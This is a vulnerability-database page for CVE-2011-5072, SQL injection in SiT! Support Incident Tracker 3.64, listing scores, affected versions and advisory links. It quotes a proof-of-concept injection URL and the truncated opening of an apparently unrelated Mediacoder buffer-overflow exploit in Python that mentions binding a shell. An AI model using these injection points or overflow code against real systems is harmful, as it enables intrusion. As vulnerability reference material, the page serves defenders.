CVE-2011-5072
Published 2012-01-29
Priority: P3 | 44 | high
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 1.11% (61.9th percentile)
Multiple SQL injection vulnerabilities in Support Incident Tracker (aka SiT!) before 3.65 allow remote attackers to execute arbitrary SQL commands via the (1) start parameter to portal/kb.php; (2) contractid parameter to contract_add_service.php; (3) id parameter to edit_escalation_path.php; (4) unlock, (5) lock, or (6) selected parameter to holding_queue.php; inc parameter in a report action to (7) report_customers.php or (8) report_incidents_by_site.php; (9) start parameter to search.php; or (10) sites parameter to transactions.php.
Affected
22 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sitracker | support_incident_tracker | <= 3.64 | — |
No detection rules found.
Exploit-DB
sit! support incident tracker 3.64 - Multiple Vulnerabilities
exploitdb·2012-02-01
CVE-2011-5074 sit! support incident tracker 3.64 - Multiple Vulnerabilities
---
Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
2) Input passed via the "contractid" GET parameter to contract_add_service.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecti
Exploit-DB
Mediacoder 2011 RC3 - '.m3u' Local Buffer Overflow
exploitdb·2011-03-20
---
# Exploit Title: Mediacoder 2011 RC3 0-days Exploit
# Google Dork: --
# Date: 20 / 3 / 2011
# Author: Oh Yaw Theng
# Software Link: http://www.mediacoderhq.com/getfile.htm?site=filemirror.s7icky.com&file=MediaCoder2011-RC3-5072.exe
# Version: 2011 RC3
# Tested on: Windows XP SP2
# CVE : --
#!/usr/bin/python
filename = "crash.m3u"
junk = "\x41" * 256
esp = "\x65\x82\xA5\x7C"
nops = "\x90" * 25
# The payload will bind a shell at Port 5555
No writeups or analysis indexed.
http://secunia.com/advisories/46019
http://sitracker.org/wiki/ReleaseNotes365
http://www.securityfocus.com/archive/1/519636
https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.html
Published: 2012-01-29